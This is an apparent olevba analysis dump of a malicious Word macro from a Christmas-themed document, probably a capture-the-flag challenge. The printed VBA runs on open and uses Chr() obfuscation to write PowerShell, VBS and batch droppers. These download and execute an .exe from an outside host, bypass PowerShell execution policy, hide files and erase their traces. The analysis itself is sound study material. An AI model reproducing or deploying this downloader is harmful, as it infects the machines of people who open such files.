olevba 0.60 on Python 3.9.8 - http://decalage.info/python/oletools =============================================================================== FILE: christmas_giveaway.docm Type: OpenXML ------------------------------------------------------------------------------- VBA MACRO ThisDocument.cls in file: word/vbaProject.bin - OLE stream: 'VBA/ThisDocument' - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Sub Auto_Open() h End Sub Sub h() Dim MY_FILENDIR, MY_FILEDIR, MY_FILDIR, XPFILEDIR USER = Environ("username") PST1 = "adobeacd-update.p" + Chr(115) + "1" BART = "adobeacd-update.b" + Chr(Asc("a")) + Chr(Asc("t")) ASDSA = "kjlasdjkasldjkldasjkadsjklsajlksajklsdjkl" VBT1 = "adobeacd-update." + Chr(118) + "bs" VBTXP = "adobeacd-updatexp.v" + Chr(Asc("b")) + "s" MY_FILENDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\AppData\Local\Temp\" + PST1 ASJDKHSJADASDSA = "jklasdjkdsajklsdajkljklsakjlsadjsdkjlsajkdlsajklsadjkladsljksad" MY_FILEDIR = "c:\" + Chr(Asc("U")) + "sers\" + USER + "\App" + Chr(Asc("D")) + "ata\Local\" + Chr(Asc("T")) + "emp\" + BART MY_FILDIR = "c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 XPFILEDIR = "c:\Windows\Temp\" + VBTXP XPBARTFILEDIR = "c:\Windows\Temp\" + BART On Error Resume Next SetAttr MY_FILENDIR, vbNormal If (Len(Dir(MY_FILENDIR)) <> 0) Then Kill MY_FILENDIR End If On Error Resume Next SetAttr MY_FILEDIR, vbNormal If (Dir(MY_FILEDIR) <> "") Then Kill MY_FILEDIR End If On Error Resume Next SetAttr MY_FILDIR, vbNormal If (Dir(MY_FILDIR) <> "") Then Kill MY_FILDIR End If On Error Resume Next SetAttr XPFILEDIR, vbNormal If (Dir(XPFILEDIR) <> "") Then Kill XPFILEDIR End If Dim FileNumber As Integer Dim FileNumb As Integer Dim FileNu As Integer Dim mttt As Integer Dim retVal As Variant 'Dim winver As Integer FileNumber = FreeFile FileNumb = FreeFile FileNu = FreeFile Dim objWMIService As Variant Dim colOperatingSystems As Variant Dim objOperatingSystem As Variant Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") For Each objOperatingSystem In colOperatingSystems SysReport = SysReport & "The operating system on this computer is " & _ objOperatingSystem.Caption & " (" & objOperatingSystem.Version & ")" Next Set objWMIService = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & ".\root\cimv2") Set colOperatingSystems = objWMIService.ExecQuery("Select * from Win32_OperatingSystem") For Each objOperatingSystem In colOperatingSystems winverstr = objOperatingSystem.Version Next winver = Val(winverstr) WaitFor (1) If (winver > 5.5) Then Open MY_FILENDIR For Output As #FileNumber Print #FileNumber, "$hashroot = '94-4a-1e-86-99-69-dd-8a-4b-64-ca-5e-6e-bc-20-9a';" Print #FileNumber, "$hash = '0';" Print #FileNumber, "$down = N" & "ew" & "-" & Chr(79) & "bject " & Chr(Asc("S")) & "y" & "stem." & Chr(78) & "et." & Chr(87) & "eb" & "Cli" & "ent;" Print #FileNumber, "$url = '" + Chr(Asc("h")) + Chr(Asc(Chr(Asc("t")))) + Chr(Asc("t")) + Chr(Asc("p")) + "://hiro-wish.com/js/bi" & "n.e" & "xe';" Print #FileNumber, "$file = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "4" & "44." + Chr(101) & "xe';" Print #FileNumber, "$down.headers[" + Chr(39) + "User-Agent" + Chr(39) + "] = 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10) AppleWebKit/600.1.25 (KHTML, like Gecko) Version/8.0 Safari/600.1.25';" Print #FileNumber, "$down" & "." & Chr(68) & "ow" & "nloa" & "dFi" & "le($u" & "rl,$" & "file);" Print #FileNumber, "$ScriptDir = $MyInvocation.ScriptName;" Print #FileNumber, "$someFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + "444.e" & Chr(Asc("x")) + "e" & "';" Print #FileNumber, "$vbsFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + VBT1 + "';" Print #FileNumber, "$batFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + BART + "';" Print #FileNumber, "$psFilePath = 'c:\Users\" + USER + "\AppData\Local\Temp\" + PST1 + "';" Print #FileNumber, "Start-Sleep -s 15;" Print #FileNumber, "c" & Chr(109) & "d.e" & Chr(120) & "e /c 'c:\Users\" + USER + "\AppData\Local\Temp" + "\444.e" & Chr(120) & "e'; " Print #FileNumber, "$file1 = gci $" + "v" + "b" + "sFilePath -Force" Print #FileNumber, "$file2 = gci $" + "b" + "a" + "t" + "FilePath -Force" Print #FileNumber, "$file3 = gci $" + "p" + "s" + "F" + "ilePath -Force" Print #FileNumber, "$file1.Attributes = $file1.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" Print #FileNumber, "$file2.Attributes = $file2.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" Print #FileNumber, "$file3.Attributes = $file3.Attributes -bxor [System.IO.FileAttributes]::Hi" + "d" + "den" Print #FileNumber, "If (Test-Path $vbsFilePath){ Remove-Item $vbsFilePath }" Print #FileNumber, "If (Test-Path $batFilePath){ Remove-Item $batFilePath }" Print #FileNumber, "If (Test-Path $someFilePath){ Remove-Item $someFilePath }" Print #FileNumber, "Remove-Item $MyINvocation.InvocationName" Close #FileNumber Open MY_FILDIR For Output As #FileNumb Print #FileNumb, "Dim dff" Print #FileNumb, "dff = 68" Print #FileNumb, "cur" & Chr(Asc("r")) & "ent" + Chr(Asc("D")) + "irectory = left(WScript.ScriptFullName,(Len(WScript.ScriptFullName))-(len(WScript.ScriptName)))" Print #FileNumb, "S" & "et o" & "bj" & Chr(Asc("F")) & "SO=C" & "re" & "at" & "eO" & "b" & "je" & "ct(" & Chr(34) & "S" & "cr" & "ipt" & "ing.F" & "ileS" & "ystem" & "Ob" & "ject" & Chr(34) & ")" Print #FileNumb, "cur" + "rent" + Chr(Asc("F")) + "ile = " & Chr(34) & "C:\" & Chr(Asc("U")) & "sers\" + USER + "\AppData\Local\Temp" + "\" + PST1 + Chr(34) Print #FileNumb, "" & Chr(83) & "et " & Chr(111) & "bj" & Chr(83) & "hel" + Chr(Asc("l")) + " = Create" & Chr(79) & Chr(98) & "ject(" & Chr(34) & "W" & Chr(115) & "cript." & Chr(115) & "hell" & Chr(34) & ")" Print #FileNumb, "" & Chr(111) & "bj" & Chr(83) & "hell" & Chr(46) & Chr(82) & "un " & Chr(34) & "p" & Chr(111) & "wer" & Chr(83) & "hell.e" & Chr(120) & "e -n" & Chr(111) & "exit -Exe" & "cutionP" & Chr(111) & "licy" & " byp" & "ass -n" & Chr(111) & "pr" & Chr(111) & "file -file " & Chr(34) & " & currentFile,0,true" Close #FileNumb Open MY_FILEDIR For Output As #FileNu Print #FileNu, "@echo off" Print #FileNu, "ping 1.1.2.2 -n 2" Print #FileNu, "chcp 1251" Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Users\" + USER + "\AppData\Local\Temp" + "\" + VBT1 + Chr(34) Print #FileNu, "exit" Close #FileNu SetAttr MY_FILENDIR, vbNormal SetAttr MY_FILEDIR, vbNormal SetAttr MY_FILDIR, vbNormal WaitFor (1) retVal = Shell(MY_FILEDIR, 0) End If If (winver <= 5.5) Then Open XPBARTFILEDIR For Output As #FileNu Print #FileNu, "@echo off" Print #FileNu, "ping 1.1.2.2 -n 2" Print #FileNu, "c" & "sc" & "ri" & "pt" & ".e" & Chr(120) & "e " & Chr(34) & "c:\Windows\Temp" + "\" + VBTXP + Chr(34) Print #FileNu, "ping 1.1.2.2 -n 2" Print #FileNu, "c:\Windows\Temp\444.exe" Print #FileNu, ":loop" Print #FileNu, "ping 1.1.2.2 -n 1" Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) Print #FileNu, "del " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + BART + Chr(34) + " goto loop" Print #FileNu, "if " + "exist " + Chr(34) + "c:\Windows\Temp\" + VBTXP + Chr(34) + " goto loop" Print #FileNu, "exit" Close #FileNu WaitFor (2) mttt = 88 Dim strFileURL, HPkXUcxLcAoMHOlj, cxPZSGdIQDAdRVpziKf, fqtSMHFlkYeyLfs, ehPsgfAcWaYrJm, FVpHoEqBKnhPO As String HPkXUcxLcAoMHOlj = "https://elvesfactory/" & Chr(Asc("H")) & Chr(84) & Chr(Asc("B")) & "" & Chr(123) & "" & Chr(84) & Chr(Asc("h")) & "1" & Chr(125 - 10) & Chr(Asc("_")) & "1s" & Chr(95) & "4" cxPZSGdIQDAdRVpziKf = "_" & Replace("present", "e", "3") & Chr(85 + 10) fqtSMHFlkYeyLfs = Replace("everybody", "e", "3") fqtSMHFlkYeyLfs = Replace(fqtSMHFlkYeyLfs, "o", "0") & "_" ehPsgfAcWaYrJm = Chr(Asc("w")) & "4" & Chr(110) & "t" & Chr(115) & "_" & Chr(Asc("f")) & "0" & Chr(121 - 7) & Chr(95) FVpHoEqBKnhPO = Replace("christmas", "i", "1") FVpHoEqBKnhPO = Replace(FVpHoEqBKnhPO, "a", "4") & Chr(119 + 6) Open XPFILEDIR For Output As #FileNumber Print #FileNumber, "strRT = HPkXUcxLcAoMHOlj & cxPZSGdIQDAdRVpziKf & fqtSMHFlkYeyLfs & ehPsgfAcWaYrJm & FVpHoEqBKnhPO" Print #FileNumber, "strTecation = " + Chr(34) + "c:\" + Chr(Asc("W")) + "indows\" + Chr(Asc("T")) + "emp\44" + "4" + "." + Chr(Asc("e")) + Chr(Asc("x")) + "e" + Chr(34) Print #FileNumber, "Set objXML" + "H" + Chr(Asc("T")) + "TP = C" + "reate" + Chr(Asc("O")) + "bject(" + Chr(34) + "MSXML2." + Chr(mttt - 54) + Chr(mttt) + Chr(mttt - 11) + Chr(mttt - 12) + Chr(72) + Chr(84) + Chr(84) + Chr(80) + ")" Print #FileNumber, "objXMLHTTP.open " + Chr(34) + "GET" + Chr(34) + ", strRT, False" Print #FileNumber, "objXMLHTTP.send() " Print #FileNumber, "If objXMLHTTP.Status = 200 Then" Print #FileNumber, "Set objADOStream = CreateObject(" + Chr(34) + "ADODB.Stream" + Chr(34) + ") " Print #FileNumber, "objADOStream.Open " Print #FileNumber, "objADOStream.Type = 1" Print #FileNumber, "objADOStream.Write objXMLHTTP.ResponseBody " Print #FileNumber, "objADOStream.Position = 0 " Print #FileNumber, "objADOStream.SaveToFile strTecation " Print #FileNumber, "objADOStream.Close " Print #FileNumber, "Set objADOStream = Nothing " Print #FileNumber, "End if " Print #FileNumber, "Set objXMLHTTP = Nothing" Print #FileNumber, "Set objShell = CreateObject(" + Chr(34) + "WScript.Shell" + Chr(34) + ")" Close #FileNumber WaitFor (1) retVal = Shell(XPBARTFILEDIR, 0) End If findTest secondTest For Each myStoryRange In ActiveDocument.StoryRanges With myStoryRange.Find .Text = "<" & "sel" & "ect>" .Replacement.Text = " " .Wrap = wdFindContinue .Execute Replace:=wdReplaceAll End With Next myStoryRange For Each myStoryRange In ActiveDocument.StoryRanges With myStoryRange.Find .Text = "" .Replacement.Text = " " .Wrap = wdFindContinue .Execute Replace:=wdReplaceAll End With Next myStoryRange For Each myStoryRange In ActiveDocument.StoryRanges With myStoryRange.Find .Text = "<" & "in" & "box>" .Replacement.Text = " " .Wrap = wdFindContinue .Execute Replace:=wdReplaceAll End With Next myStoryRange For Each myStoryRange In ActiveDocument.StoryRanges With myStoryRange.Find .Text = "" .Replacement.Text = " " .Wrap = wdFindContinue .Execute Replace:=wdReplaceAll End With Next myStoryRange End Sub Sub WaitFor(NumOfSeconds As Long) Dim SngSec As Long SngSec = Timer + NumOfSeconds Do While Timer < SngSec DoEvents Loop End Sub Sub AutoOpen() Auto_Open End Sub Sub Workbook_Open() Auto_Open End Sub Sub findTest() Dim firstTerm As String Dim secondTerm As String Dim rrtt As Range Dim selRange As Range Dim selectedText As String Set rrtt = ActiveDocument.Range firstTerm = "" secondTerm = "" ASKASAIEJ = "ask as8d j vnbnfghfthfth sad" With rrtt.Find .Text = firstTerm .MatchWholeWord = True .Execute ASKUKKIEJ = "aasdlkasjdask as8d j vnbnfghfthfth sad" rrtt.Collapse direction:=wdCollapseEnd Set selRange = ActiveDocument.Range selRange.Start = rrtt.End .Text = secondTerm .MatchWholeWord = True .Execute ASKSASADW = "asjldklas" rrtt.Collapse direction:=wdCollapseStart selRange.End = rrtt.Start selectedText = selRange.Delete End With End Sub Sub secondTest() Dim firstTerm As String Dim secondTerm As String Dim myRanget As Range Dim yytt As Range Dim selRanget As Range Dim selectedTextt As String Set yytt = ActiveDocument.Range firstTerm = "" secondTerm = "" ASKIEJSASAHBDJ = "ask as8d j asdasl;a adfsdvsdgsdfsdf sad" With yytt.Find .Text = firstTerm .MatchWholeWord = True .Execute ASKIEJ = "ask as8d j vnbnfghfthfth sad" yytt.Collapse direction:=wdCollapseEnd ASKIEJSHBDJ = "askasda as8d j asdaasdassl;a adfsdvsdgsdfsdf sad" Set selRanget = ActiveDocument.Range selRanget.Start = yytt.End .Text = secondTerm .MatchWholeWord = True .Execute ASAKJSKIEJSHBDJ = "ask as8d j asdaasdasdassl;a adfsdvsdgsdfsdf sad" yytt.Collapse direction:=wdCollapseStart selRanget.End = yytt.Start selectedTextt = selRanget selRanget.Font.Color = wdColorBlack End With End Sub